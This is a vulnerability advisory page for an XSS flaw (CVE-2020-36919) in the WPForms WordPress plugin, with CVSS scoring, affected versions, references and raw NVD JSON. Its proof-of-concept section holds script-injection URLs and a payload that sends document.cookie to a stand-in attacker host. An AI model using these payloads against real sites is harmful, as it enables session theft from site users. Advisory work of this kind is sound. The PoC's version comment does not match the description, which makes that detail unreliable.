Security Vulnerability Report
CVE-2020-36919 CVSS 6.1 MEDIUM

CVE-2020-36919

Published: 2026-01-13 23:15:49
Last Modified: 2026-01-29 00:50:28

Description

WPForms 1.7.8 contains a cross-site scripting vulnerability in the slider import search feature and tab parameter. Attackers can inject malicious scripts through the ListTable.php endpoint to execute arbitrary JavaScript in victim's browser.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:wpforms:wpforms:*:*:*:*:lite:wordpress:*:* - VULNERABLE
WPForms <= 1.7.8 (versionEndIncluding: 1.7.8)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2020-36919 XSS PoC -->
<!-- Target: WordPress site with WPForms < 1.7.8 -->
<!-- XSS via tab parameter in ListTable.php -->
https://target-site.com/wp-admin/admin.php?page=wpforms-builder&view=sliders&tab=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
<!-- XSS via slider import search feature -->
<!-- Inject payload in the search field -->
<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>
<!-- Example malicious URL for reference -->
<!-- http://vulnerable-site.com/wp-admin/admin.php?page=wpforms-builder&tab="><script>alert('XSS')</script> -->

References

https://wordpress.org/plugins/wpforms-lite (Product)
https://www.exploit-db.com/exploits/51152 (Exploit)
https://www.vulncheck.com/advisories/wpforms-cross-site-scripting-xss (Third Party Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2020-36919", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:48.717", "lastModified": "2026-01-29T00:50:28.337", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WPForms 1.7.8 contains a cross-site scripting vulnerability in the slider import search feature and tab parameter. Attackers can inject malicious scripts through the ListTable.php endpoint to execute arbitrary JavaScript in victim's browser."}, {"lang": "es", "value": "WPForms 1.7.8 contiene una vulnerabilidad de cross-site scripting en la función de búsqueda de importación de deslizadores y el parámetro de pestaña. Los atacantes pueden inyectar scripts maliciosos a través del endpoint ListTable.php para ejecutar JavaScript arbitrario en el navegador de la víctima."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", 
"modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wpforms:wpforms:*:*:*:*:lite:wordpress:*:*", "versionEndIncluding": "1.7.8", "matchCriteriaId": "C2C0B222-34A9-40E4-89E3-937E76944165"}]}]}], "references": [{"url": "https://wordpress.org/plugins/wpforms-lite", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51152", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/wpforms-cross-site-scripting-xss", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}